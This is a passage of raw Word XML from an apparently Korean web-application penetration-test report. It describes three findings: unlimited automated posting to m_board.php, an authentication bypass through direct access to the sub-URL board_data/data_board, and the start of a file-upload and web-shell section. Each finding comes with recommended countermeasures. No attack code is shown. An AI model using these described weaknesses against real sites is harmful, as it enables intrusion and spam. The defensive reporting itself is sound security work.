              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="003B76B6" w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>rd.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidTr="00C97C1E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41B5F" w:rsidRPr="0070637F" w:rsidRDefault="00C41B5F" w:rsidP="00C97C1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C41B5F" w:rsidRPr="0070637F" w:rsidRDefault="00C41B5F" w:rsidP="00C97C1E">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="003B76B6" w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>m_bo</w:t>
            </w:r>
            <w:r w:rsidR="003B76B6" w:rsidRPr="0070637F">
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="003B76B6" w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">rd.php에 대한 접근 횟수에 제한이 없어, </w:t>
            </w:r>
            <w:r w:rsidR="00C97C1E" w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>자동화 공격을 통한 게시판 도배가 가능함</w:t>
            </w:r>
            <w:r w:rsidR="003B76B6" w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C97C1E" w:rsidRPr="00C97C1E" w:rsidRDefault="00C97C1E" w:rsidP="00C41B5F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C97C1E" w:rsidP="00C41B5F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C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5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C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>무차별로 글 쓰기가 가능한지 자동화 공격 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C97C1E" w:rsidP="00C41B5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406525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="600075" cy="180975"/>
                <wp:effectExtent l="0" t="0" r="28575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F9B70" id="직사각형 41" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:89.25pt;margin-top:110.75pt;width:47.25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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C41B5F" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DF3670B" wp14:editId="2DC4F8A0">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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6" b="50602"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860424" cy="306048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B5F" w:rsidRPr="0070637F" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="480" w:name="_Toc48909173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21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C97C1E" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>자동화 공격 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5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2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>반복적인 글 쓰기 요청을 보내,</w:t>
      </w:r>
      <w:r w:rsidR="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>무차별로 글 쓰기 가능 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5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423F4" wp14:editId="41044153">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1133474</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1748790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="600075" cy="114300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BF61" id="직사각형 24" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:89.25pt;margin-top:137.7pt;width:47.2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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637570FA" wp14:editId="2B7C212E">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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8" b="49992"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860401" cy="306047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B5F" w:rsidRPr="0070637F" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="_Toc48909174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22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C97C1E" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>자동화 공격 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C97C1E" w:rsidP="00C97C1E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C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="_Toc48909064"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="0070637F" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00C97C1E" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>데이터 등록,</w:t>
      </w:r>
      <w:r w:rsidR="00C97C1E" w:rsidRPr="0070637F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97C1E" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>메일 발송 등 웹 어플리케이션</w:t>
      </w:r>
      <w:r w:rsidR="00114523" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 기능에 대한 사용 통제 로직 구현이 필요</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00C41B5F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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 웹 방화벽 rule set 설정을 통해 대량의 불특정 프로세스 요청을 차단</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00C41B5F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t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">CAPTCHA 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>등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 xml:space="preserve"> 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>일회성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 xml:space="preserve"> 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>확인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 xml:space="preserve"> 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>로직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 xml:space="preserve"> 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>구현을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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>권장</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRDefault="00C41B5F" w:rsidP="00F0740E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="_Toc48909065"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>프로세스 검증 누락</w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523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484" w:name="_Toc48909066"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인증이 필요한 모든 중요(관리자 페이지,</w:t>
      </w:r>
      <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">회원변경 페이지 등) 페이지에 재한 접근 제어가 미흡한 경우 하위 </w:t>
      </w:r>
      <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>직접 접근,</w:t>
      </w:r>
      <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트 조작 등의 방법으로 중요한 페이지에 재한 접근이 가능함</w:t>
      </w:r>
      <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523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485" w:name="_Toc48909067"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="485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114523" w:rsidRPr="00C97C1E" w:rsidTr="00752E25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114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00752E2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114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00752E25">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
              <w:t>board_data/data_board</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidTr="00752E25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114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00752E2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114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00A24C89">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">인증 절차가 있는 페이지이지만, 하위 </w:t>
            </w:r>
            <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
              <w:t>URL</w:t>
            </w:r>
            <w:r w:rsidR="00A24C89" w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">에 직접 접근이 </w:t>
            </w:r>
            <w:r w:rsidR="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>가능함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0070637F" w:rsidRDefault="0070637F" w:rsidP="00114523">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="0070637F" w:rsidP="00114523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114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="0011452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752E25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>특정 웹 디렉터리에 접근 시 인증 절차 로직을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="0070637F" w:rsidP="0011452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43342</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1488558" cy="212652"/>
                <wp:effectExtent l="0" t="0" r="16510" b="1651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212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D8B9F" id="직사각형 4" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:45.95pt;margin-top:3.4pt;width:117.2pt;height:1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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00114523" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28E2468C" wp14:editId="0BB9348A">
            <wp:extent cx="4859151" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="266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7043" r="24049" b="40556"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860445" cy="306081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523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="486" w:name="_Toc48909175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23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752E25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>인증 로직 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="486"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="0011452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="00653FB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#2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="00653FB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>인증을 우회하여 하위 디렉터리의 파일에 접근 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="0011452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3B192AC6" wp14:editId="4F8AC718">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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46" b="44472"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860384" cy="306045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523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="487" w:name="_Toc48909176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24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653FB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>인증 우회 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="487"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523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114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523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488" w:name="_Toc48909068"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRDefault="00114523" w:rsidP="00114523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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00653FB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인증이 필요한 모든 페이지에 대해 유효 세션임을 확인하는 프로세스 및 주요 정보 페이지에 접근 요청자의 권한 검증 로직을 구현</w:t>
      </w:r>
      <w:r w:rsidR="00A04580">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653FB0" w:rsidRDefault="00653FB0" w:rsidP="00653FB0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>유효 세션의 검증 및 페이지에 대한 접근 권한은 스크립트에 의존하지 말며,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Server Side Script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 구현된 프로세스를 사용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653FB0" w:rsidRPr="0070637F" w:rsidRDefault="00653FB0" w:rsidP="00653FB0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우회될 수 있는 플로우를 차단</w:t>
      </w:r>
      <w:r w:rsidR="00A04580">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 및 권한 매트릭스를 기준으로 전 페이지에서 권한 체크가 이루어지도록 구현함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00A04580" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="489" w:name="_Toc48909069"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>파일 업로드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="489"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523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114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523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114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523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114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="850"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="490" w:name="_Toc48909070"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.12.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="490"/>
    </w:p>
    <w:p w:rsidR="00A04580" w:rsidRDefault="00114523" w:rsidP="00114523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="00A04580">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공격자가 조작된 </w:t>
      </w:r>
      <w:r w:rsidR="00A04580">
        <w:t xml:space="preserve">Server Side Script </w:t>
      </w:r>
      <w:r w:rsidR="00A04580">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일을 업로드 하고 실행 가능한 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="0070637F" w:rsidRDefault="00A04580" w:rsidP="00114523">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 쉘 권한 획득하여 홈페이지를 통해 시스템 명령어를 실행하고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 브라우저를 통해 그 결과 값을 보며, 시스템 권리자 권한 또는 인접 서버에 대한 침입을 시도할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
